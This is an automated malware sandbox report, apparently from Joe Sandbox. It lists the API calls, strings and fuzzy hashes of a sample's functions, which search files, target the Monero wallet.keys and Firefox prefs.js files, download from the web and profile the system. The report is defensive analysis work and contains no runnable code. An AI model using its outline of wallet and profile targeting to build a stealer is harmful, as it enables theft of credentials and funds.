Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 053cec97995e184c25363a79e030562699d0f9399830c1eaec2a47c3a87102c3
Instruction ID: 361b54e9d4c9194b68f09f064dcc356d0934eeab53d9569b31a4b4f10a041d8d
Opcode Fuzzy Hash: 053cec97995e184c25363a79e030562699d0f9399830c1eaec2a47c3a87102c3
Instruction Fuzzy Hash: BAB17471900A08AFDB25FF60DC96EEE7778AF55304F4081A8E50A9E541EF306B49DF92

Function 003A16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003C510C,?,?,?,003C51B4,?,?,00000000,?,00000000), ref: 003A1923
StrCmpCA.SHLWAPI(?,003C525C), ref: 003A1973
StrCmpCA.SHLWAPI(?,003C5304), ref: 003A1989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003A1D40
DeleteFileA.KERNEL32(00000000), ref: 003A1DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 003A1E20
FindClose.KERNEL32(000000FF), ref: 003A1E32

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Strings

\*.*, xrefs: 003A17F1

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 11ecc54f9af1d79202c8614b307a61512903977cc23938352e6daffcab2bf1e4
Instruction ID: 5824030ed9eb037bdaed7467bcbabf740cd3a83aad7163bac43b483bea031ec4
Opcode Fuzzy Hash: 11ecc54f9af1d79202c8614b307a61512903977cc23938352e6daffcab2bf1e4
Instruction Fuzzy Hash: 46120971910918ABDB27FB60CC96EED777CAF54304F404199B206AA891EF306F89DF91

Function 003ADA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003C14B0,003C0C2A), ref: 003ADAEB
StrCmpCA.SHLWAPI(?,003C14B4), ref: 003ADB33
StrCmpCA.SHLWAPI(?,003C14B8), ref: 003ADB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 003ADDCC
FindClose.KERNEL32(000000FF), ref: 003ADDDE

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 151128186a82b7128464bf06cd2bc500ec63d52fec9dd5e22e30e45cf4178f09
Instruction ID: 0c48e35b3f46ce2225199243266ea71594cd75a9f209a0151fa0026001684c91
Opcode Fuzzy Hash: 151128186a82b7128464bf06cd2bc500ec63d52fec9dd5e22e30e45cf4178f09
Instruction Fuzzy Hash: 26917672900A04A7CB16FBB0DC96DED777CAF95304F408558F90A9E941EE34AB0DDB92

Function 003A60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Part of subcall function 003A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003A4839
Part of subcall function 003A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003A4849

InternetOpenA.WININET(003C0DF7,00000001,00000000,00000000,00000000), ref: 003A610F
StrCmpCA.SHLWAPI(?,00F3EFF8), ref: 003A6147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003A618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003A61B3
InternetReadFile.WININET(?,?,00000400,?), ref: 003A61DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003A620A
CloseHandle.KERNEL32(?,?,00000400), ref: 003A6249
InternetCloseHandle.WININET(?), ref: 003A6253
InternetCloseHandle.WININET(00000000), ref: 003A6260

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 0d5e4bc7c15e940eb1b38e21b4b6a05b79549e8efbd1d58caedfdfb95dedea07
Instruction ID: 052ec38e79b3349afc34316c0017e83e72fc27611096e30adbe327f223110ef9
Opcode Fuzzy Hash: 0d5e4bc7c15e940eb1b38e21b4b6a05b79549e8efbd1d58caedfdfb95dedea07
Instruction Fuzzy Hash: EE51A3B1900218ABDF25DFA0DC86BEE77B8FB44705F108498F605AB1C0DB746A89DF95

Function 003B7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

GetKeyboardLayoutList.USER32(00000000,00000000,003C05AF), ref: 003B7BE1
LocalAlloc.KERNEL32(00000040,?), ref: 003B7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 003B7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003B7C62
LocalFree.KERNEL32(00000000), ref: 003B7D22

Strings

/ , xrefs: 003B7C7F

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 52a8b070fad3872c99caaa4138470c540c3c648f607687538703e80dd04bb72a
Instruction ID: d621c5f79cdd0bcfcf1464f040311fade5af7f0e4c5ea63748295829d2ad787e
Opcode Fuzzy Hash: 52a8b070fad3872c99caaa4138470c540c3c648f607687538703e80dd04bb72a
Instruction Fuzzy Hash: E5417F71900618ABDB25DFA4DC99BEDB7B8FF44704F2041D9E209A6580DB342F85CFA1

Function 003AE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003C0D73), ref: 003AE4A2
StrCmpCA.SHLWAPI(?,003C14F8), ref: 003AE4F2
StrCmpCA.SHLWAPI(?,003C14FC), ref: 003AE508
FindNextFileA.KERNEL32(000000FF,?), ref: 003AEBDF

Strings

\*.*, xrefs: 003AE44D

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 9677add7aac26d1085d2458252805e9637030ef8823a5b79c2158d7477c15f1b
Instruction ID: 50cc1f00e2c2227254929b6ecd054e24ed60c45f1ccfaabd2a0063b04c66e2ee
Opcode Fuzzy Hash: 9677add7aac26d1085d2458252805e9637030ef8823a5b79c2158d7477c15f1b
Instruction Fuzzy Hash: DA125B7191091877DB1AFB70DCA6EED7378AF54304F404198B60A9A891EF306F49DF92

Function 003B9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003B961E
Process32First.KERNEL32(003C0ACA,00000128), ref: 003B9632
Process32Next.KERNEL32(003C0ACA,00000128), ref: 003B9647
StrCmpCA.SHLWAPI(?,00000000), ref: 003B965C
CloseHandle.KERNEL32(003C0ACA), ref: 003B967A

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 707c0036623575a67bafa406c125ddf67341fd0c5eb0ab79f470fc9df3b1d327
Instruction ID: f150867a3dcfe83b6989a358f867403b20f9efaf8ee023da1dc2e5c3520e4acf
Opcode Fuzzy Hash: 707c0036623575a67bafa406c125ddf67341fd0c5eb0ab79f470fc9df3b1d327
Instruction Fuzzy Hash: 51011EB5A00208EBDB15DFA5CD88BEDBBF8EB58314F104189AA4997640E734AB44DF51

Function 003B7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00F3E948,00000000,?,003C0E10,00000000,?,00000000,00000000), ref: 003B7A63
RtlAllocateHeap.NTDLL(00000000), ref: 003B7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00F3E948,00000000,?,003C0E10,00000000,?,00000000,00000000,?), ref: 003B7A7D
wsprintfA.USER32 ref: 003B7AB7

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
